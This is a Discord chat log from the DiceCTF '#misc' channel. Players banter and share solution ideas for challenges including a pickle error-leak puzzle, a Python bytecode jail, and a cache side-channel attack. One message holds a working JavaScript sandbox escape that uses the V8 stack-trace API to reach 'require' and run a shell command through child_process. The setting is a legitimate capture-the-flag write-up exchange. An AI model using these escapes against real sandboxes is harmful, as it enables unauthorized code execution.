#misc

I'm moral support

coool

r/me_irl

aplet is not moral support

aplet solves many challenges

wow defund doesn't even feel morally supported by me

just be DRS and crush everyone's dreams with taxes

😔

i'm moral unsupport 🙂

so tester cool

and support ticket closer

lmaoo
cypat blue team nerd that closes all easy vulns in pwn?

player opens ticket, jyu immediately closes

🅱️ased

Thank you for your ticket. If there is nothing further, please use /close to close this ticket. Goodbye and good luck!

ack im only 200 qubits of stuff away ahhhh

I think defund means solve challenges in the context of actually doing a ctf

not hosting dicectf

/close

but I guess I did playtest breach

ohhh i c cool

channel still here lies

There are no questions in DiceCTF

https://tenor.com/view/ba-sing-se-gif-20976912

@lean wasp I believe you have some enforcement

ack wat

!q 939595934914969631

🚫 Failed to parse the message param: Found the channel, but not the message. Did it get removed or is it in a channel I can't read messages from?
🔧 Command usage: ![quote|q] <message>

fasdfasdf

My team is going to kill me after this

!q 805962849872117781 939595934914969631

🚫 Failed to parse the message param: `ˋI'm sorry but I have no clue where you want me to go look for a message with that info. Please try again by providing me the info in one of the following formats:

• <jumplink> (can be acquired by clicking 'Copy Message Link' in the right click menu of a message),
• <messageid> (only works if that server has edit logs enabled) or
• <messageid>-<channelid> (can be acquired by holding shift when clicking 'copy id' on the message menu)ˋ🔧 Command usage:![quote|q] <message>`

asdfhiuasdfjoisdajfasdiofjasoifjas

Since I didnt get any crypto

!q 939595934914969631-805962849872117781

🚫 Failed to parse the message param: The specified channel doesn't exist, you either gave me an invalid channel ID or it was deleted.
🔧 Command usage: ![quote|q] <message>

...

lmaoo

barge is actually trolling me

!q 767776595099385876 hi

🚫 Failed to parse the message param: `ˋI'm sorry but I have no clue where you want me to go look for a message with that info. Please try again by providing me the info in one of the following formats:

• <jumplink> (can be acquired by clicking 'Copy Message Link' in the right click menu of a message),
• <messageid> (only works if that server has edit logs enabled) or
• <messageid>-<channelid> (can be acquired by holding shift when clicking 'copy id' on the message menu)ˋ🔧 Command usage:![quote|q] <message>`

!q hi

🚫 Failed to parse the message param: `ˋI'm sorry but I have no clue where you want me to go look for a message with that info. Please try again by providing me the info in one of the following formats:

• <jumplink> (can be acquired by clicking 'Copy Message Link' in the right click menu of a message),
• <messageid> (only works if that server has edit logs enabled) or
• <messageid>-<channelid> (can be acquired by holding shift when clicking 'copy id' on the message menu)ˋ🔧 Command usage:![quote|q] <message>`

what are you even trying to quote lmao

I feel like I should be only a few qubits away but I didnt set up any prints in my qasm so idk

sadge

why does barge just not know the misc channel exists

!q 939593858226982942

it knows the rev channel exists

why does it not know the misc channel exists???

!q 805962849872117781-939596708801835018

Wat

wtf

it knows

Maybe the bot cant read deleted stuff

one sec

!q 805962849872117781-939596945440243712

🚫 Failed to parse the message param: Found the channel, but not the message. Did it get removed or is it in a channel I can't read messages from?
🔧 Command usage: ![quote|q] <message>

lmao

"Did it get removed"

I believe so

ok whatever I'm pretty sure barge has message logs of deleted messages that it can quote from

!q 939596027432935504

good enough

Wat how

!q 939596027432935504

🚫 You don't have permission to read that message.

lmao

oh

Well I gtg to some quantum

Ireland is prob like 300 years ahead of our time

an admin for sober-bishop?

Open a ticket #create-ticket

cant wait for my chal to get cheesed

🙏

i'm a python noob XD

what's the intended solution of Vinegar?

guess each character by comparing error message?

Stack massaging to get a dcode object on the stack

overwrite gift.code with gift

isn't this TI-1337 Silver Edition?

Lol, yeah

Too tired 😂

Some manual work trying to get errors messages etc to leak everything

Can't see any writeup as yet

essentially this yeah

working backwards seems easiest, by setting up the pickle stack in a certain way you can bring down most character options to one or two

for example, the 6th character from the back leaks the last 4 characters of the flag in the form of an error message

Interested to see if anyone found a smarter solution for Sober Bishop? Mine takes about 30 seconds to run on 4 cores

I use BFS plus guessing 2 characters, takes 10 seconds

My solution was to explore each position from the start and backtrack if a point was visited too many times

Sped up by preloading dice{ ofc

about vinegar:

semd(b"U" + pos + "\n")
# result near the end: Memo value not found at index 959525424
# memo happens with j (which then has 4 bytes of index => 959525424 == 0219
# Congratulations, you just leaked the last 5 bytes of the flag: j0219

is using stacktrace the intended way to get arguments on undefined?

undefined is in the author writeups

sorry, didn't see it 😅

my soln finds all collisions in 25s on a single core

What's the full flag for vinegar? I got to about here-ish before going insane

#   12345678901234567890
# \ndice{buh2Pdj0219__}
#        ..?.??.....??}

``dice{buh2Qdj0219}`

Ah, that's pretty interesting. Nice one

ouch, I thought there were more chars 😦

once you got that "truncated" error you would know that you're out of chars

so any wp of vinegar and TI-1337 Silver Edition

@lean wasp

vinegar, figure it out from the error messages you get if you try to use the flag as unpickling instructions (and data)

TI-1337:

• functions builds are stripped not illegal, so you can get a code object with some stack massaging c = (lambda x: eval(x), lambda x: eval(x))[0]
• You could call gift through CALL_METHOD: gift.f = gift; gift.f(gift, "__code__", c)
• then gift still refers to the proper builtins, so you get full regular code exec in that eval

I've always wanted to make a v8 stacktrace challenge

but eventually I realized that

v8 stacktrace api is basically a more annoying version of arguments.callee.caller

I haven't found a use case for stacktrace api beyond that

maybe you could use it to leak code length in an eval? idk kinda contrived and you could probably just parse the error message anyway

(btw the stacktrace api also doesn't give access to callers in strict mode so not even that is an advantage)

any wp for Cache On The Side?

The solution boils down to this: allocate aligned map chunk in the same way as victim.c and measure timings for memory accesses for different values of c - one that is slower corresponds to the flag's character (Reducing WAYS_MAX to 8 helps) . This way allows to recover lower 6 bits of each character, because Skylake L1 cache has 64 associativity sets. Now there're up to two meaningful possible values for each, so you can make an educated guess about what the flag is:

dice{31$%-#(!./V3,3_702+_2_73,1}
dice{s1de-chan/V3ls_w0rk_2_w3l1}```

thank you

seems like a prime+probe attack? Is exploit source code available?

I tried writing one,but didn't work😢

yeah, it is just a more complicated version of arguments.callee.caller

try {
    null.f()
} catch (e) {
    TypeError = e.constructor
}
Object = {}.constructor
String = ''.constructor
Error = TypeError.prototype.__proto__.constructor
function CustomError() {
    const oldStackTrace = Error.prepareStackTrace
    try {
        Error.prepareStackTrace = (err, structuredStackTrace) => structuredStackTrace
        Error.captureStackTrace(this)
        this.stack
    } finally {
        Error.prepareStackTrace = oldStackTrace
    }
}
function trigger() {
    const err = new CustomError()
    console.log(err.stack[0])
    for (const x of err.stack) {
        const fn = x.getFunction()
        console.log(String(fn).slice(0, 200))
        console.log(fn?.arguments)
        console.log('='.repeat(40))
        if ((args = fn?.arguments)?.length > 0) {
            req = args[1]
            console.log(req('child_process').execSync('id').toString())
        }
    }
}
trigger()

Here's mine (requires a lot of manual postprocessing of the results though): https://gist.github.com/winger/06149f119701bb84641db533903fd12f

Thanks

I will be publishing my writeup by tomorrow. Ping me if I forget and you want to see it.

It is possible to get the exact character every time, as the cache has 1024 sets. So you could get 10 bits of information, but obviously the victim wasn't sending any values that large.

L2_TOTAL_LINES: 16384     L2_SIZE / (bytes/line=64)
L2_TOTAL_SETS: 1024       i.e. # of indexes. L2_TOTAL_LINES / (associativity=16)```

Oh, I didn't consider L2 cache in my solution 😅 And for some reason I wasn't able to distinguish between the characters with the same 6 lower bits in my experiments either

Curious to know why nobody else solved 5dfs. Were people just put off by go lol?

I thought the challenge was actually quite cool, even if a typo made it very easy to exploit

poortho threatened to clown on people who cheesed

🤡

😔

that works because 2 hyperthreads share the same cache?

Which tool or script was used to automate the solving process of slime bishop

@tame bolt here's one

There's no tool afaik, it's just about implementing an algorithm that can find the flag

https://gist.github.com/wiresboy/a1ccfb4dcfd3957630176e2b58884973
LMK if you have any questions

(It also might be slightly overkill, the exact form of the challenge morphed as I was writing it so some optimizations I made may no longer matter. But I think I removed most of that weirdness already)

For undefined I had a way to reach the node TTY class (via console._stdout somewhere), and some other classes from builtin node modules, was thinking for a while if there's anything that can be exploited to read files... didn't work out, but there might be potential for another CTF challenge in that

Next year TI-1337 Color Edition?

🙈 🙉 🙊

?

well it was fun watching the suffering/fun collection of zero days proving dice is better than pb

color edition was already a thing last year :p

https://ctftime.org/task/14704

i am starting to struggle with names

TI-73 Explorer

Hmm maybe its time for the TI 74 series

TI-77135

TI-1337 revenge

@lean wasp time for the ti-31337 series